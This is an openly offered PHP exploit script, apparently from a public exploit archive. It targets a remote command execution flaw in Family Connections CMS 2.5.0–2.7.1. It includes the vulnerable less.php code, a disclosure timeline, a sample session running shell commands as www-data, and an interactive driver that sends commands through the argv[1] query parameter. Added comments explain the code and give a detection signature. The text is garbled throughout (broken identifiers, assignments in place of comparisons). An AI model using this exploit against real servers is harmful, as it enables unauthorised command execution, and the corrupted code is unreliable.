<? Php
/*
Family connections CMS v2.5.0-v2.7.1 remote command execution exploit
Developer: https://www.familycms.com/
Download: https://www.familycms.com/download.php
Author: mr_me: rwx kru
Email: steventhomasseeley! Gmail! Com
----------------------------------
php.ini requirements:
register_globals = On
register_argc_argv = Off
This bug is almost identical to CVE-2005-2651
Poc: http://www.bkjia.com/[path]/dev/less. php? Argv [1] = | id;
The vulnerable code is on lines 20-36 in ./dev/less.php ($theme is taken straight from $argv[1], which register_globals lets a web request populate, and is interpolated unescaped into the system() call on the last line):
-->
$ Theme = isset ($ argv [1])? $ Argv [1]: 'default ';
System ("clear ");
If (file_exists ("$ dir/themes/$ theme/style.css "))
{
Echo "\ n [themes/$ theme/style.css] already exists. \ n ";
Echo "Overwrite [y/n]? ";
$ Handle = fopen ("php: // stdin", "r ");
$ Line = fgets ($ handle );
If (trim ($ line )! = 'Y ')
{
Exit;
}
}
$ Worked = system ("php-q ~ /Bin/lessphp/lessc $ dir/themes/$ theme/dev. less> $ dir/themes/$ theme/style.css ");
<--
Timeline:
-Nov 28th discovered and reported using ticket 407 (http://sourceforge.net/apps/trac/fam-connections/ticket/407)
-Dec 2nd, vendor stated that they will fix the issue
-Dec 4th, vendor keeps pushing back release 2.7.2 with no firm planned date
-Dec 4th, Public disclosure
-----------------------------------
mr_me@gliese:~/pentest/web/0day/fcms$ php poc.php -t 192.168.220.128 /webapps/FCMS_2.7.1/ -p 127.0.0.1:8080
--------------------------------------------------------------------------------
Family Connections CMS v2.5.0-v2.7.1 (less. php) remote command execution exploit
By mr_me of rwx kru-net-ninja.net/rwx. biz. nf
--------------------------------------------------------------------------------
(+) Setting the proxy to 127.0.0.1:8080
Mr_me@192.168.220.128 # id
Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
Mr_me@192.168.220.128 # uname-
Linux steve-web-server 2.6.35-31-generic # 62-Ubuntu SMP Tue Nov 8 14:00:30 UTC 2011 i686 GNU/Linux
Mr_me@192.168.220.128 # q
*/
// Banner and argument-count check for the command-line driver. Note that this
// copy of the script is garbled (capitalised keywords, spaces inside
// identifiers, e.g. "Print_r (") and is not runnable as-is; the comments
// below describe what the text evidently intended.
Print_r ("
--------------------------------------------------------------------------------
Family Connections CMS v2.5.0-v2.7.1 (less. php) remote command execution exploit
By mr_me of rwx kru-net-ninja.net/rwx. biz. nf
--------------------------------------------------------------------------------
");
// Fewer than two positional arguments: print usage and stop. The usage text
// still mentions WordPress paths (-d /wp/), which looks copied from another
// tool; the parsing further down actually takes host and path positionally.
If ($ argc <3 ){
Print_r ("
-----------------------------------------------------------------------------
Usage: php ". $ argv [0]."-t
Host: target server (ip/hostname)
Path: directory path to wordpress
Options:
-P [ip: port]: specify a proxy
Example:
Php ". $ argv [0]."-t 192.168.1.5-d/wp/-p FIG: 8080
Php ". $ argv [0]."-t 192.168.1.5-d/wp/
-----------------------------------------------------------------------------
"); Die;
}
// 7 = E_ERROR | E_WARNING | E_PARSE: notices are hidden, which is why the
// undefined-variable uses later in the file (e.g. $cmd before the first
// read) do not print anything.
Error_reporting (7 );
// No script time limit; 5-second socket timeout for fsockopen() below.
Ini_set ("max_execution_time", 0 );
Ini_set ("default_socket_timeout", 5 );
// Dotted-quad (IPv4 only) pattern that sendpacket() applies to the -p proxy
// address. Only the address is checked; the proxy port is never validated.
$ Proxy_regex = "(\ B \ d {1, 3} \. \ d {1, 3} \. \ d {1, 3} \. \ d {1, 3} \ B )";
// Minimal argv parser. Returns an associative array:
//   --key=value  -> $_ARG['key'] = 'value'
//   -x           -> $_ARG['x'] = "true" (only the first character after the
//                   dash is kept, so "-p" and "-proxy" are the same flag)
//   anything else -> appended to the positional list $_ARG['input']
// Uses the POSIX ereg() API, which was removed in PHP 7; on PHP 7+ this
// function fails before reaching the rest of the script.
Function setArgs ($ argv ){
$ _ ARG = array ();
Foreach ($ argv as $ arg ){
If (ereg ("-- ([^ =] +) = (. *)", $ arg, $ reg )){
$ _ ARG [$ reg [1] = $ reg [2];
} Elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){
$ _ ARG [$ reg [1] = "true ";
} Else {
$ _ ARG ["input"] [] = $ arg;
}
}
Return $ _ ARG;
}
// Positional arguments: input[0] is the script name, input[1] the target host
// (optionally host:port), input[2] the application path, input[3] the
// proxy host:port when -p was given.
$ MyArgs = setArgs ($ argv );
$ Host = $ myArgs ["input"] ["1"];
$ Path = $ myArgs ["input"] ["2"];
// As transcribed this is an assignment (=), not a comparison; presumably a
// garbled "== true"/"!== false". Either way strpos() returns an offset, so a
// truthiness test misfires when ":" is at offset 0 - TODO confirm against a
// clean copy.
If (strpos ($ host, ":") = true ){
$ HostAndPort = explode (":", $ myArgs ["input"] [1]);
$ Host = $ hostAndPort [0];
$ Port = (int) $ hostAndPort [1];
} Else {
$ Port = 80;
}
// -p flag: the proxy is taken from input[3] as host:port. The port is not
// cast or validated here; sendpacket() validates only the address against
// $proxy_regex.
If (strcmp ($ myArgs ["p"], "true") === 0 ){
$ ProxyAndPort = explode (":", $ myArgs ["input"] [3]);
$ Proxy = $ proxyAndPort [0];
$ Pport = $ proxyAndPort [1];
Echo "(+) Setting the proxy to". $ proxy. ":". $ pport. "\ r \ n ";
} Else {
Echo "(-) Warning, a proxy was not set \ r \ n ";
}
// rgod's sendpacketii() function
// Sends one raw HTTP request string, either straight to $host:$port or via
// the -p proxy, and stores the full raw response (headers included) in the
// global $html. There is no return value; every failure path calls die.
// All state is passed through globals ($myArgs, $proxy, $host, $pport, $port,
// $html, $proxy_regex) set at file level above.
Function sendpacket ($ packet ){
Global $ myArgs, $ proxy, $ host, $ pport, $ port, $ html, $ proxy_regex;
// Direct connection when -p was not given. (The literal here is "true " with
// a trailing space in this copy, unlike the "true" compared earlier -
// presumably a transcription artifact.)
If (strcmp ($ myArgs ["p"], "true ")! = 0 ){
$ Ock = fsockopen (gethostbyname ($ host), $ port );
If (! $ Ock ){
Echo "(-) No response from". $ host. ":". $ port; die;
}
}
Else {
// Proxy address must match the IPv4 dotted-quad pattern; hostnames are
// rejected here even though the usage text says "ip:port".
$ C = preg_match ($ proxy_regex, $ proxy );
If (! $ C ){
Echo "(-) Not a valid proxy... \ n"; die;
}
$ Ock = fsockopen ($ proxy, $ pport );
If (! $ Ock ){
Echo "(-) No response from proxy..."; die;
}
}
Fputs ($ ock, $ packet );
// Again an assignment (=) as transcribed; presumably "== """ was meant, i.e.
// "no proxy configured" - TODO confirm.
If ($ proxy = ""){
// Direct: read line by line until the server closes the connection.
$ Html = "";
While (! Feof ($ ock )){
$ Html. = fgets ($ ock );
}
} Else {
// Via proxy: read one byte at a time while the socket is open or no
// CRLF CRLF (end of headers) has been seen yet. Uses eregi(), removed in
// PHP 7.
$ Html = "";
While ((! Feof ($ ock) or (! Eregi (chr (0x0d). chr (0x0a). chr (0x0d). chr (0x0a), $ html ))){
$ Html. = fread ($ ock, 1 );
}
}
Fclose ($ ock );
}
// Request target for the GET line: a path only when talking to the server
// directly, an absolute URI (scheme + host + port + path) when going through
// a proxy. Same trailing-space "true " literal as in sendpacket().
If (strcmp ($ myArgs ["p"], "true ")! = 0) {$ p = $ path;} else {$ p = "http: //". $ host. ":". $ port. $ path ;}
// Reads one line (at most 254 bytes, fgets length 255) from /dev/stdin and
// returns it including the trailing newline; the caller trim()s it.
// /dev/stdin is Unix-specific, unlike the php://stdin stream used by the
// vulnerable less.php quoted in the header.
Function read (){
$ Fp1 = fopen ("/dev/stdin", "r ");
$ Input = fgets ($ fp1, 255 );
Fclose ($ fp1 );
Return $ input;
}
// Interactive loop: prints a user@host# prompt, reads one command per line,
// and stops on the quit keyword tested at the top. $cmd is undefined on the
// first comparison; error_reporting(7) above hides the notice.
While ($ cmd! = "Q "){
Echo "\ n". get_current_user (). "@". $ host ."#";
$ Cmd = trim (read ());
// The command is bracketed by the literal markers fcms_start / fcms_end so
// its output can be cut out of the HTML response below.
$ C = urlencode ("echo fcms_start;". $ cmd. "; echo fcms_end ");
// One GET per command to dev/less.php, payload in the argv[1] query
// parameter preceded by a pipe (the register_globals path described in the
// header). Detection note: any web request for dev/less.php, or one whose
// query string carries an argv[...] parameter or the fcms_start/fcms_end
// strings, is the signature of this exploit; less.php appears to be a CLI
// developer helper (it prompts on php://stdin) and should not be reachable
// over HTTP at all. Only a Host header is sent; no other headers follow.
$ Packet = "GET". $ p. "dev/less. php? Argv [1] = | ". $ c."; HTTP/1.1 \ r \ n ";
$ Packet. = "host:". $ host. "\ r \ n ";
If ($ cmd! = "Q "){
Sendpacket ($ packet );
// sendpacket() leaves the raw response in global $html. Splitting on the
// markers and taking element [2] implies fcms_start is expected to occur
// twice in the response - why is not derivable from this file.
$ Html = explode ("fcms_start", $ html );
$ ___ Response = explode ("fcms_end", $ html [2]);
Echo (trim ($ ___ response [0]);
}
}
?>